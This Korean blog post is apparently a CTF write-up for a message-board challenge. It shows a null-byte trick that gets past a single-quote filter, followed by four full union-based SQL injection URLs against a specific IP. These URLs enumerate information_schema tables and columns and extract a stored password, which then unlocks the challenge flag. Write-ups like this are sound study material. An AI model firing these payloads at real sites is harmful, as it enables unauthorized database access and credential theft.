쓰기 기능과 검색 기능이 있고 Read me if you can 글이 있는 게시판 공략
Read me if you can을 읽으려하면 비밀번호가 필요함
쓰기 기능이 있는 곳 jpg만 업로드 가능함
검색 search 부분에 쿼터 스트링 사용 금지 라는 메시지가 뜸
This means that they are searching for the single quote character in the query
variable. (PPP 보고서 中)
널바이트를 넣고 쿼터를 쓰면 잘됨
http://221.141.3.111/__board/board.php?order=subject&search=%00' union select 'a','b','c','d','e','f','g','h','i','j','k'%23
c가 제목 부분이란걸 알수 있음,
http://221.141.3.111/__board/board.php?order=subject&search=%00' union select 'a','b',(select group_concat(table_name) from information_schema.tables),'d','e','f','g','h','i','j','k' %23
sonic_board 라는 테이블이 보인다
http://221.141.3.111/__board/board.php?order=subject&search=%00' union select 'a','b',(select group_concat(column_name) from information_schema.columns where table_name='sonic_board'),'d','e','f','g','h','i','j','k' %23
pass 라는 컬럼이 보인다
http://221.141.3.111/__board/board.php?order=subject&search=%00' union select 'a','b',(select pass from sonic_board limit 0,1),'d','e','f','g','h','i','j','k' %23
pass 컬럼에는 sonic!%#$**()%#_?qwerasdfzxcv{} 가 있다
Read me if you can의 비밀번호로 sonic!%#$**()%#_?qwerasdfzxcv{}를 넣음
Password is : HackingForCola
'컴터 때찌 > CTF' 카테고리의 다른 글
[wowhacker] 7번(AuThWithMySQL) (0) | 2011.04.29 |
---|---|
pCTF[14] Sha1 is fun (0) | 2011.04.26 |
[Codegate 2011] Vuln200 (0) | 2011.03.10 |
[Codegate 2011] Vuln100 (0) | 2011.03.10 |
Padocon 2011 WTF400(Doc) (0) | 2011.01.21 |